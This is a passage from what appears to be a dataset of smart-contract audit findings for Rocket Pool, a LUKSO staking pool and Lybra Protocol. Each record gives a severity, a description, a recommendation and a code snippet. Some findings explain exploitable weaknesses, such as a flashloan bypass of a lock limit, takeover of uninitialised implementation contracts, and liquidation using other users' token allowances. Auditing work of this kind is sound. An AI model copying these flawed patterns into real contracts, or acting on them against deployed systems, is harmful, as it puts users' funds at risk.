It should be enforced by checking this parameter against a whitelist of `currency` addresses.чEnhance the validation of the following parameters: `tokenPrice`, `minAmountPerBuyer`, `lastBuyDate`, `currency`.чч```\\nrequire(\\_arguments.tokenPrice != 0, \"\\_tokenPrice needs to be a non-zero amount\");\\n```\\n -Missing Events on Important State ChangesчmediumчThroughout the code base, various important settings-related state changes are not surfaced by events.\\nIn RocketDAONodeTrusted:\\n```\\nfunction bootstrapMember(string memory _id, string memory _url, address _nodeAddress) override external onlyGuardian onlyBootstrapMode onlyRegisteredNode(_nodeAddress) onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets add them\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalInvite(_id, _url, _nodeAddress);\\n}\\n\\n\\n// Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n\\n// Bootstrap mode - Bool Setting\\nfunction bootstrapSettingBool(string memory _settingContractName, string memory _settingPath, bool _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalSettingBool(_settingContractName, _settingPath, _value);\\n}\\n```\\n\\nIn RocketDAOProtocol:\\n```\\nfunction bootstrapSettingMulti(string[] memory _settingContractNames, string[] memory _settingPaths, 
SettingType[] memory _types, bytes[] memory _values) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAOProtocolProposalsInterface(getContractAddress(\"rocketDAOProtocolProposals\")).proposalSettingMulti(_settingContractNames, _settingPaths, _types, _values);\\n}\\n\\n/// @notice Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAOProtocolProposalsInterface(getContractAddress(\"rocketDAOProtocolProposals\")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n```\\n\\nTreasury address setter:\\n```\\nfunction bootstrapTreasuryNewContract(string memory _contractName, address _recipientAddress, uint256 _amountPerPeriod, uint256 _periodLength, uint256 _startTime, uint256 _numPeriods) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n RocketDAOProtocolProposalsInterface(getContractAddress(\"rocketDAOProtocolProposals\")).proposalTreasuryNewContract(_contractName, _recipientAddress, _amountPerPeriod, _periodLength, _startTime, _numPeriods);\\n}\\n```\\n\\nBootstrap mode management:\\n```\\nfunction bootstrapDisable(bool _confirmDisableBootstrapMode) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n require(_confirmDisableBootstrapMode == true, \"You must confirm disabling bootstrap mode, it can only be done once!\");\\n setBool(keccak256(abi.encodePacked(daoNameSpace, \"bootstrapmode.disabled\")), true);\\n}\\n```\\n\\nOne-time treasury spends:\\n```\\nfunction bootstrapSpendTreasury(string memory _invoiceID, address _recipientAddress, uint256 _amount) override 
external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n RocketDAOProtocolProposalsInterface(getContractAddress(\"rocketDAOProtocolProposals\")).proposalTreasuryOneTimeSpend(_invoiceID, _recipientAddress, _amount);\\n}\\n```\\n\\n```\\nfunction setDelegate(address _newDelegate) external override onlyRegisteredNode(msg.sender) {\\n```\\n\\n```\\nfunction proposalSettingUint(string memory _settingNameSpace, string memory _settingPath, uint256 _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalSettingBool(string memory _settingNameSpace, string memory _settingPath, bool _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalSettingAddress(string memory _settingNameSpace, string memory _settingPath, address _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalInvite(string calldata _id, address _memberAddress) override public onlyLatestContract(\"rocketDAOProtocolProposals\", msg.sender) {\\n // Their proposal executed, record the block\\n```\\nчResolution\\nThe client implemented a fix in commit `1be41a88a40125baf58d8904770cd9eb9e0732bb` and provided the following statement:\\nRocketDAONodeTrusted is not a contract that is getting upgrade so this won't be fixed\\nRocketDAOProtocol has been updated to include events for each bootstrap function\\nRocketNetworkVoting has been updated to emit an event\\nRocketDAOSecurityProposals has been updated to emit events for all proposals\\nWe 
recommend emitting events on state changes, particularly when these are performed by an authorized party. The implementation of the recommendation should be analogous to the handling of events on state changes in the rest of the system, such as in the `RocketMinipoolPenalty` contract:\\n```\\nfunction setMaxPenaltyRate(uint256 _rate) external override onlyGuardian {\\n // Update rate\\n maxPenaltyRate = _rate;\\n // Emit event\\n emit MaxPenaltyRateUpdated(_rate, block.timestamp);\\n}\\n```\\nчч```\\nfunction bootstrapMember(string memory _id, string memory _url, address _nodeAddress) override external onlyGuardian onlyBootstrapMode onlyRegisteredNode(_nodeAddress) onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets add them\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalInvite(_id, _url, _nodeAddress);\\n}\\n\\n\\n// Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n\\n// Bootstrap mode - Bool Setting\\nfunction bootstrapSettingBool(string memory _settingContractName, string memory _settingPath, bool _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalSettingBool(_settingContractName, _settingPath, _value);\\n}\\n```\\n -RocketDAOProtocolProposal._propose() Should Revert if _blockNumber > block.numberчmediumчCurrently, the 
`RocketDAOProtocolProposal._propose()` function does not account for scenarios where `_blockNumber` is greater than `block.number`. This is a critical oversight, as voting power cannot be determined for future block numbers.\\n```\\nfunction _propose(string memory _proposalMessage, uint256 _blockNumber, uint256 _totalVotingPower, bytes calldata _payload) internal returns (uint256) {\\n```\\nчWe recommend updating the function to revert on transactions where `_blockNumber` exceeds `block.number`. This will prevent the creation of proposals with undefined voting power and maintain the integrity of the voting process.чч```\\nfunction _propose(string memory _proposalMessage, uint256 _blockNumber, uint256 _totalVotingPower, bytes calldata _payload) internal returns (uint256) {\\n```\\n -Unused Parameter and Improper Parameter Sanitization in RocketNetworkVoting.calculateVotingPower()чlowчThe `matchedETH` parameter in `RocketNetworkVoting.calculateVotingPower()` is unused.\\n```\\n// Get contracts\\nRocketDAOProtocolSettingsNodeInterface rocketDAOProtocolSettingsNode = RocketDAOProtocolSettingsNodeInterface(getContractAddress(\"rocketDAOProtocolSettingsNode\"));\\n```\\n\\nAdditionally, the `_block` parameter is not sanitized. Thus, if calling the function with a block number `_block` where `_block >= block.number`, the call will revert because of a division-by-zero error. Indeed, `rocketNetworkSnapshots.lookupRecent` will return a `rplPrice` of zero since the checkpoint does not exist. 
Consequently, the function `calculateVotingPower` will revert when computing the `maximumStake`.\\n```\\nkey = keccak256(abi.encodePacked(\"rpl.staked.node.amount\", _nodeAddress));\\nuint256 rplStake = uint256(rocketNetworkSnapshots.lookupRecent(key, uint32(_block), 5));\\n\\nreturn calculateVotingPower(rplStake, ethMatched, ethProvided, rplPrice);\\n```\\n\\n```\\nuint256 maximumStake = providedETH * maximumStakePercent / rplPrice;\\n```\\nчWe recommend removing the unused parameter to enhance code clarity. The presence of unused parameters can lead to potential confusion for future developers. Additionally, we recommend ensuring that the snapshotted `rplPrice` value exists before it is used to compute the `maximumStake` value.чч```\\n// Get contracts\\nRocketDAOProtocolSettingsNodeInterface rocketDAOProtocolSettingsNode = RocketDAOProtocolSettingsNodeInterface(getContractAddress(\"rocketDAOProtocolSettingsNode\"));\\n```\\n -Wrong/Misleading NatSpec DocumentationчlowчThe NatSpec documentation in several parts of the code base contains inaccuracies or is misleading. 
This issue can lead to misunderstandings about how the code functions, especially for developers who rely on these comments for clarity and guidance.\\nIn `RocketDAOProtocolProposal`, the NatSpec comments are potentially misleading:\\n```\\n/// @notice Get the votes against count of this proposal\\n/// @param _proposalID The ID of the proposal to query\\n```\\n\\n```\\n/// @notice Returns true if this proposal was supported by this node\\n/// @param _proposalID The ID of the proposal to query\\n/// @param _nodeAddress The node operator address to query\\nfunction getReceiptDirection(uint256 _proposalID, address _nodeAddress) override public view returns (VoteDirection) {\\n return VoteDirection(getUint(keccak256(abi.encodePacked(daoProposalNameSpace, \"receipt.direction\", _proposalID, _nodeAddress))));\\n}\\n```\\n\\nIn RocketDAOProtocolVerifier, the NatSpec documentation is incomplete, which might leave out critical information about the function's purpose and behavior:\\n```\\n/// @notice Used by a verifier to challenge a specific index of a proposal's voting power tree\\n/// @param _proposalID The ID of the proposal being challenged\\n/// @param _index The global index of the node being challenged\\n```\\nчThe NatSpec documentation should be thoroughly reviewed and corrected where necessary. We recommend ensuring it accurately reflects the code's functionality and provides complete information.чч```\\n/// @notice Get the votes against count of this proposal\\n/// @param _proposalID The ID of the proposal to query\\n```\\n -RocketDAOProtocolSettingsRewards.setSettingRewardClaimPeriods() Cannot Be Invokedчlowч```\\nsetUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"periods\")), _periods);\\n```\\nчTo make this function useful and align it with its intended purpose, we recommend integrating its functionality into `RocketDAOProtocolProposals`. 
In addition, we recommend that this function emit an event upon successful change of settings, enhancing the transparency of the operation.чч```\\nsetUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"periods\")), _periods);\\n```\\n -No Protection of Uninitialized Implementation Contracts From AttackerчmediumчIn contracts that implement OpenZeppelin's UUPS model, an uninitialized implementation contract can be taken over by an attacker via its `initialize` function; it is recommended to invoke the `_disableInitializers` function in the constructor to prevent the implementation contract from being used by the attacker. However, all the contracts which implement `OwnablePausableUpgradeable` do not call `_disableInitializers` in the constructors\\n```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract Pool is IPool, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract StakedLyxToken is OwnablePausableUpgradeable, LSP4DigitalAssetMetadataInitAbstract, IStakedLyxToken, ReentrancyGuardUpgradeable {\\n```\\n\\netc.чInvoke `_disableInitializers` in the constructors of contracts which implement `OwnablePausableUpgradeable` including the following:\\n```\\nPool\\nPoolValidators\\nFeeEscrow\\nReward\\nStakeLyxTokem\\nOracles \\nMerkleDistributor\\n```\\nчч```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n -Unsafe Function receiveFees AcknowledgedчlowчIn the Pool contract, function `receiveFees` is used to compensate for a potential penalty/slashing in the protocol by sending LYX back to the pool without minting sLYX, but the side effect is that anyone can send LYX to the pool, which could mess up the pool balance after all validators have exited; in fact, it can be replaced by another function `receiveWithoutActivation` with access control which does the same thing.\\n```\\nfunction receiveFees() external payable override 
{}\\n```\\n\\n```\\nfunction receiveWithoutActivation() external payable override {\\n require(msg.sender == address(stakedLyxToken) || hasRole(DEFAULT\\_ADMIN\\_ROLE, msg.sender), \"Pool: access denied\");\\n}\\n```\\nчRemove function `receiveFees`чч```\\nfunction receiveFees() external payable override {}\\n```\\n -Unnecessary Matching in Unstake ProcessчlowчFunction `unstakeProcessed` in `StakedLyxToken` contract, when `unstakeAmount > totalPendingUnstake`, all the unstake requests should be able to be processed, thus no need to go through the matching, as a result, extra gas in the matching can be saved.\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\nчPut the matching part (line 393-411) into else branch of `if unstakeAmount > totalPendingUnstake`, change the if branch into following:\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n totalPendingUnstake = 0;\\n unstakeRequestCurrentIndex = unstakeRequestCount;\\n _unstakeRequests[unstakeRequestCount].amountFilled = _unstakeRequests[unstakeRequestCount].amount;\\n } \\n```\\nчч```\\nif (unstakeAmount > 
totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n -No Protection of Uninitialized Implementation Contracts From AttackerчmediumчIn the contracts implement Openzeppelin's UUPS model, uninitialized implementation contract can be taken over by an attacker with `initialize` function, it's recommended to invoke the `_disableInitializers` function in the constructor to prevent the implementation contract from being used by the attacker. 
However all the contracts which implements `OwnablePausableUpgradeable` do not call `_disableInitializers` in the constructors\\n```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract Pool is IPool, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract StakedLyxToken is OwnablePausableUpgradeable, LSP4DigitalAssetMetadataInitAbstract, IStakedLyxToken, ReentrancyGuardUpgradeable {\\n```\\n\\netc.чInvoke `_disableInitializers` in the constructors of contracts which implement `OwnablePausableUpgradeable` including following:\\n```\\nPool\\nPoolValidators\\nFeeEscrow\\nReward\\nStakeLyxTokem\\nOracles \\nMerkleDistributor\\n```\\nчч```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n -Unnecessary Matching in Unstake ProcessчlowчFunction `unstakeProcessed` in `StakedLyxToken` contract, when `unstakeAmount > totalPendingUnstake`, all the unstake requests should be able to be processed, thus no need to go through the matching, as a result, extra gas in the matching can be saved.\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\nчPut the matching part 
(line 393-411) into else branch of `if unstakeAmount > totalPendingUnstake`, change the if branch into following:\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n totalPendingUnstake = 0;\\n unstakeRequestCurrentIndex = unstakeRequestCount;\\n _unstakeRequests[unstakeRequestCount].amountFilled = _unstakeRequests[unstakeRequestCount].amount;\\n } \\n```\\nчч```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n -Re-Entrancy Risks Associated With External Calls With Other Liquid Staking Systems.чhighчAs part of the strategy to integrate with Liquid Staking tokens for Ethereum staking, the Lybra Protocol vaults are required to make external calls to Liquid Staking systems.\\nFor example, the `depositEtherToMint` function in the vaults makes external calls to deposit Ether and receive the LSD tokens back. While external calls to untrusted third-party contracts may be dangerous, in this case, the Lybra Protocol already extends trust assumptions to these third parties simply through the act of accepting their tokens as collateral. 
Indeed, in some cases the contract addresses are even hardcoded into the contract and called directly instead of relying on some registry:\\n```\\ncontract LybraWstETHVault is LybraPeUSDVaultBase {\\n Ilido immutable lido;\\n //WstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;\\n //Lido = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;\\n constructor(address \\_lido, address \\_asset, address \\_oracle, address \\_config) LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {\\n lido = Ilido(\\_lido);\\n }\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, \"DNL\");\\n uint256 sharesAmount = lido.submit{value: msg.value}(address(configurator));\\n require(sharesAmount != 0, \"ZERO\\_DEPOSIT\");\\n lido.approve(address(collateralAsset), msg.value);\\n uint256 wstETHAmount = IWstETH(address(collateralAsset)).wrap(msg.value);\\n depositedAsset[msg.sender] += wstETHAmount;\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,wstETHAmount, block.timestamp);\\n }\\n```\\n\\nIn that case, depending on the contract, it may be known what contract is being called, and the risk may be assessed as far as what logic may be executed.\\nHowever, in the cases of `BETH` and `rETH`, the calls are being made into a proxy and a contract registry of a DAO (RocketPool's DAO) respectively.\\n```\\ncontract LybraWBETHVault is LybraPeUSDVaultBase {\\n //WBETH = 0xa2e3356610840701bdf5611a53974510ae27e2e1\\n constructor(address \\_asset, address \\_oracle, address \\_config)\\n LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {}\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, \"DNL\");\\n uint256 preBalance = collateralAsset.balanceOf(address(this));\\n IWBETH(address(collateralAsset)).deposit{value: msg.value}(address(configurator));\\n uint256 
balance = collateralAsset.balanceOf(address(this));\\n depositedAsset[msg.sender] += balance - preBalance;\\n\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,balance - preBalance, block.timestamp);\\n }\\n```\\n\\n```\\nconstructor(address \\_rocketStorageAddress, address \\_rETH, address \\_oracle, address \\_config)\\n LybraPeUSDVaultBase(\\_rETH, \\_oracle, \\_config) {\\n rocketStorage = IRocketStorageInterface(\\_rocketStorageAddress);\\n}\\n\\nfunction depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, \"DNL\");\\n uint256 preBalance = collateralAsset.balanceOf(address(this));\\n IRocketDepositPool(rocketStorage.getAddress(keccak256(abi.encodePacked(\"contract.address\", \"rocketDepositPool\")))).deposit{value: msg.value}();\\n uint256 balance = collateralAsset.balanceOf(address(this));\\n depositedAsset[msg.sender] += balance - preBalance;\\n\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,balance - preBalance, block.timestamp);\\n}\\n```\\n\\nAs a result, it is impossible to make any guarantees for what logic will be executed during the external calls. Namely, reentrancy risks can't be ruled out, and the damage could be critical to the system. While the trust in these parties isn't in question, it would be best practice to avoid any additional reentrancy risks by placing reentrancy guards. 
Indeed, in the `LybraRETHVault` and `LybraWbETHVault` contracts, one can see the possible damage as the calls are surrounded in a `preBalance <-> balance` pattern.\\nThe whole of third party Liquid Staking systems' operations need not be compromised, only these particular parts would be enough to cause critical damage to the Lybra Protocol.чAfter conversations with the Lybra Finance team, it has been assessed that reentrancy guards are appropriate in this scenario to avoid any potential reentrancy risk, which is exactly the recommendation this audit team would provide.чч```\\ncontract LybraWstETHVault is LybraPeUSDVaultBase {\\n Ilido immutable lido;\\n //WstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;\\n //Lido = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;\\n constructor(address \\_lido, address \\_asset, address \\_oracle, address \\_config) LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {\\n lido = Ilido(\\_lido);\\n }\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, \"DNL\");\\n uint256 sharesAmount = lido.submit{value: msg.value}(address(configurator));\\n require(sharesAmount != 0, \"ZERO\\_DEPOSIT\");\\n lido.approve(address(collateralAsset), msg.value);\\n uint256 wstETHAmount = IWstETH(address(collateralAsset)).wrap(msg.value);\\n depositedAsset[msg.sender] += wstETHAmount;\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,wstETHAmount, block.timestamp);\\n }\\n```\\n -The Deployer of GovernanceTimelock Gets Privileged Access to the System.чhighчThe `GovernanceTimelock` contract is responsible for Roles Based Access Control management and checks in the Lybra Protocol. 
It offers two functions specifically that check if an address has the required role - `checkRole` and checkOnlyRole:\\n```\\nfunction checkRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender) || hasRole(DAO, \\_sender);\\n}\\n\\nfunction checkOnlyRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender);\\n}\\n```\\n\\nIn `checkRole`, the contract also lets an address with the role `DAO` bypass the check altogether, making it a powerful role.\\nFor initial role management, when the `GovernanceTimelock` contract gets deployed, its constructor logic initializes a few roles, assigns relevant admin roles, and, notably, assigns the `DAO` role to the contract, and the `DAO` and the `GOV` role to the deployer.\\n```\\nconstructor(uint256 minDelay, address[] memory proposers, address[] memory executors, address admin) TimelockController(minDelay, proposers, executors, admin) {\\n \\n \\_setRoleAdmin(DAO, GOV);\\n \\_setRoleAdmin(TIMELOCK, GOV);\\n \\_setRoleAdmin(ADMIN, GOV);\\n \\_grantRole(DAO, address(this));\\n \\_grantRole(DAO, msg.sender);\\n \\_grantRole(GOV, msg.sender);\\n}\\n```\\n\\nThe assignment of such powerful roles to a single private key with the deployer has inherent risks. Specifically in our case, the `DAO` role alone as we saw may bypass many checks within the Lybra Protocol, and the `GOV` role even has role management privileges.\\nHowever, it does make sense to assign such roles at the beginning of the deployment to finish initialization and assign the rest of the roles. One could argue that having access to the `DAO` role in the early stages of the system's life could allow for quick disaster recovery in the event of incidents as well. 
Though, it is still dangerous to hold privileges for such a system in a single address as we have seen over the last years in security incidents that have to do with compromised keys.чWhile redesigning the deployment process to account for a lesser-privileged deployer would be ideal, the Lybra Finance team should at least transfer ownership as soon as the deployment is complete to minimize compromised private key risk.чч```\\nfunction checkRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender) || hasRole(DAO, \\_sender);\\n}\\n\\nfunction checkOnlyRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender);\\n}\\n```\\n -The configurator.getEUSDMaxLocked() Condition Can Be Bypassed During a FlashloanчmediumчWhen converting `EUSD` tokens to `peUSD`, there is a check that limits the total amount of `EUSD` that can be converted:\\n```\\nfunction convertToPeUSD(address user, uint256 eusdAmount) public {\\n require(\\_msgSender() == user || \\_msgSender() == address(this), \"MDM\");\\n require(eusdAmount != 0, \"ZA\");\\n require(EUSD.balanceOf(address(this)) + eusdAmount <= configurator.getEUSDMaxLocked(),\"ESL\");\\n```\\n\\nThe issue is that there is a way to bypass this restriction. An attacker can get a flash loan (in EUSD) from this contract, essentially reducing the visible amount of locked tokens (EUSD.balanceOf(address(this))).чMultiple approaches can solve this issue. One would be adding reentrancy protection. 
Another one could be keeping track of the borrowed amount for a flashloan.чч```\\nfunction convertToPeUSD(address user, uint256 eusdAmount) public {\\n require(\\_msgSender() == user || \\_msgSender() == address(this), \"MDM\");\\n require(eusdAmount != 0, \"ZA\");\\n require(EUSD.balanceOf(address(this)) + eusdAmount <= configurator.getEUSDMaxLocked(),\"ESL\");\\n```\\n -Liquidation Keepers Automatically Become eUSD Debt Providers for Other Liquidations.чmediumчOne of the most important mechanisms in the Lybra Protocol is the liquidation of poorly collateralized vaults. For example, if a vault is found to have a collateralization ratio that is too small, a liquidator may provide debt tokens to the protocol and retrieve the vault collateral at a discount:\\n```\\nfunction liquidation(address provider, address onBehalfOf, uint256 assetAmount) external virtual {\\n uint256 assetPrice = getAssetPrice();\\n uint256 onBehalfOfCollateralRatio = (depositedAsset[onBehalfOf] \\* assetPrice \\* 100) / borrowed[onBehalfOf];\\n require(onBehalfOfCollateralRatio < badCollateralRatio, \"Borrowers collateral ratio should below badCollateralRatio\");\\n\\n require(assetAmount \\* 2 <= depositedAsset[onBehalfOf], \"a max of 50% collateral can be liquidated\");\\n require(EUSD.allowance(provider, address(this)) != 0, \"provider should authorize to provide liquidation EUSD\");\\n uint256 eusdAmount = (assetAmount \\* assetPrice) / 1e18;\\n\\n \\_repay(provider, onBehalfOf, eusdAmount);\\n uint256 reducedAsset = assetAmount \\* 11 / 10;\\n totalDepositedAsset -= reducedAsset;\\n depositedAsset[onBehalfOf] -= reducedAsset;\\n uint256 reward2keeper;\\n if (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n } else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n }\\n emit 
LiquidationRecord(provider, msg.sender, onBehalfOf, eusdAmount, reducedAsset, reward2keeper, false, block.timestamp);\\n}\\n```\\n\\nTo liquidate the vault, the liquidator needs to transfer debt tokens from the provider address, which in turn needs to have had approved allowance of the token for the vault:\\n```\\nrequire(EUSD.allowance(provider, address(this)) != 0, \"provider should authorize to provide liquidation EUSD\");\\n```\\n\\nThe allowance doesn't need to be large, it only needs to be non-zero. While it is true that in the `superLiquidation` function the allowance check is for `eusdAmount`, which is the amount associated with `assetAmount` (the requested amount of collateral to be liquidated), the liquidator could simply call the maximum of the allowance the provider has given to the vault and then repeat the liquidation process. The allowance does not actually decrease throughout the liquidation process.\\n```\\nrequire(EUSD.allowance(provider, address(this)) >= eusdAmount, \"provider should authorize to provide liquidation EUSD\");\\n```\\n\\nNotably, this address doesn't have to be the same one as the liquidator. In fact, there are no checks on whether the liquidator has an agreement or allowance from the provider to use their tokens in this particular vault's liquidation. The contract only checks to see if the provider has `EUSD` allowance for the vault, and how to split the rewards if the provider is different from the liquidator:\\n```\\nif (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n} else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, 